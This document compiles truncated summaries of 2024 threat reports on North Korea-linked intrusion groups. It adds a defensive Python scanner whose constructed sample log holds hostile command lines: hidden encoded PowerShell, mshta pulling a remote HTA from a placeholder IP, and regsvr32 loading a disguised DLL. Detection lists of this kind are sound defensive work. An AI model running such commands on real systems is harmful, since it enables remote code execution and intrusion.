NSHC's May 2024 threat actor intelligence report summarizes activity collected by the ThreatRecon team across several tracked intrusion clusters. The report states that SectorA groups were observed in many countries and describes job-recruitment social en…
NSHC's April 2024 threat actor intelligence report summarizes observed activity from multiple tracked intrusion clusters during the March to April reporting window. The report notes that SectorA groups were active alongside other regional clusters, with t…
QiAnXin Threat Intelligence Center's 2024 midyear threat report excerpt covers APT activity, ransomware, cybercrime, and zero-day exploitation trends. The excerpt says APT attacks in the first half of 2024 mainly targeted information technology, governmen…
A Kimsuky-attributed analysis describes a malicious Microsoft Management Console file named Skibidi Boilet Master.msc that masquerades as a legitimate Windows management artifact. The source provides hashes for the sample and shows embedded MMC visual att…
Gen Threat Labs reported that Lazarus exploited CVE-2024-38193, a Windows AFD.sys zero-day later patched by Microsoft, to reach sensitive system areas. The source says Gen researchers found the exploitation in early June and observed the Fudmodule malware…
Kandji analyzed TodoSwift, a signed macOS Swift/SwiftUI dropper uploaded to VirusTotal on 2024-07-24 and assessed as likely related to DPRK-linked BlueNoroff activity because of overlap with KandyKorn and RustBucket tradecraft. The TodoTasks application p…
Chainalysis reported that stolen cryptocurrency funds and ransomware inflows rose in 2024 even as aggregate illicit on-chain activity declined year to date. In the DPRK-relevant section, the report says attackers, including North Korea-linked IT workers, …
The thread describes a crypto team losing $1.3 million from its treasury after malicious code was pushed by developers later assessed to be DPRK IT workers using fake identities. The investigator mapped related developer payment addresses across more than…
Hauri's advisory provides defensive checks for suspected exploitation or misuse of vaccine management servers. It instructs administrators to query management-server logs for suspicious program execution strings such as PowerShell, cmd, mshta, winhost, ta…
The analysis examines a 2019 Kimsuky sample disguised as a Korean-language HWP quotation document with a double extension ending in .exe. The loader drops a decoy HWP file and a DLL named NewAct.dat, then uses regsvr32 to register the DLL. The DLL checks …
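The two entries above describe detection opportunities that can be turned into log-hunting logic: the Hauri advisory's search of management-server logs for interpreter and LOLBin strings, and the 2019 Kimsuky loader's use of a double-extension `.exe` lure and `regsvr32` to register a DLL renamed to `NewAct.dat`. The following is an added example, not code from Hauri, the Kimsuky analysis or any vendor: it scans constructed process-execution records in a hypothetical "timestamp host user command" format (the sample lines and hostnames are invented) and flags three patterns. The interpreter list reproduces only the names visible in the summary (PowerShell, cmd, mshta, winhost); the truncated entry is not guessed.

```python
import re

# Constructed sample records (hypothetical format and hosts, not from any real
# vaccine management server): "<timestamp> <host> <user> <command line>".
SAMPLE_LOG = r"""
2024-05-02T09:14:03 agent-017 SYSTEM C:\ProgramData\Vaccine\update.exe /check
2024-05-02T09:15:41 agent-017 SYSTEM powershell.exe -nop -w hidden -enc SQBFAFgA
2024-05-02T09:16:02 agent-022 admin cmd.exe /c whoami
2024-05-02T09:16:30 agent-022 admin mshta.exe http://203.0.113.10/x.hta
2024-05-02T09:17:12 agent-031 SYSTEM regsvr32.exe /s C:\Users\Public\NewAct.dat
2024-05-02T09:17:40 agent-031 SYSTEM regsvr32.exe /s C:\Windows\System32\msxml3.dll
2024-05-02T09:18:05 agent-031 user1 C:\Users\user1\Downloads\quotation.hwp.exe
"""

# Image names the Hauri advisory tells administrators to search for (the
# advisory's list is longer; only the names visible in the summary are used).
SUSPICIOUS_NAMES = ("powershell", "cmd", "mshta", "winhost")

# A "document" extension followed by .exe, e.g. quotation.hwp.exe, as in the
# 2019 Kimsuky HWP quotation lure.
DOUBLE_EXT_RE = re.compile(r"\.[a-z0-9]{1,4}\.exe$", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, accepting both backslash and slash separators."""
    return re.split(r"[\\/]", path)[-1]


def stem(name: str) -> str:
    """Lower-cased file name without its final extension."""
    return (name.rsplit(".", 1)[0] if "." in name else name).lower()


def scan_line(line: str) -> list:
    """Return one finding dict per rule that fires on a single log record."""
    parts = line.split(maxsplit=3)
    if len(parts) < 4:
        return []
    _ts, host, user, command = parts
    tokens = command.split()
    image = basename(tokens[0])
    hits = []

    # Rule 1: interpreter / LOLBin execution on a management server.
    if stem(image) in SUSPICIOUS_NAMES:
        hits.append("suspicious_interpreter")

    # Rule 2: regsvr32 asked to register a module whose name does not end in
    # .dll (the Kimsuky loader registered NewAct.dat this way). Switches such
    # as /s and /i are skipped; every remaining argument is treated as a path.
    if stem(image) == "regsvr32":
        targets = [t for t in tokens[1:] if not t.startswith("/")]
        if any(not t.lower().endswith(".dll") for t in targets):
            hits.append("regsvr32_non_dll_module")

    # Rule 3: any argument or image with a double extension ending in .exe.
    if any(DOUBLE_EXT_RE.search(basename(t)) for t in tokens):
        hits.append("double_extension_executable")

    return [{"host": host, "user": user, "rule": r, "command": command} for r in hits]


def scan_log(text: str) -> list:
    """Run scan_line over every non-empty record and collect the findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            findings.extend(scan_line(line))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['rule']:28} {f['host']:10} {f['user']:7} {f['command']}")
```

On the constructed sample the scanner reports three interpreter executions, one `regsvr32` registration of a non-`.dll` module, and one double-extension executable, while the legitimate updater and the `msxml3.dll` registration pass silently. In production the string match should be applied to the image path field of the agent's own log schema rather than to a free-text command line, and the regsvr32 rule should also consider `/i:` and `scrobj.dll` style abuse, which the summaries above do not describe.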
Cinder reported repeated attempts by suspected North Korean IT workers to obtain remote software engineering roles at the company under false or fabricated identities. The applicants often used newly created professional profiles, AI-edited or obscured pr…
Group-IB observed a Windows BeaverTail variant attributed to Lazarus alongside JavaScript BeaverTail distribution through trojanized ReactJS games packaged as NPM-based projects. The Windows sample masqueraded as a conferencing application named FCCCall.e…
A Kimsuky-attributed CHM lure masqueraded as a South Korean National Assembly committee meeting schedule, suggesting targeting of lawmakers, legislative aides, or related personnel. The sample displayed garbled visible content while embedded HTML and CHM …
Famous Chollima is a North Korea-linked, state-sponsored adversary active since at least 2018 and formerly tracked by CrowdStrike as the BadClone activity cluster. CrowdStrike characterizes the group’s main objective as financial gain through illicit free…
A Kimsuky-attributed phishing analysis examines files for a spoofed Yonsei University webmail page. The source identifies suspected phishing domains and shows PHP logic designed to capture submitted usernames, passwords, request URLs, and client address d…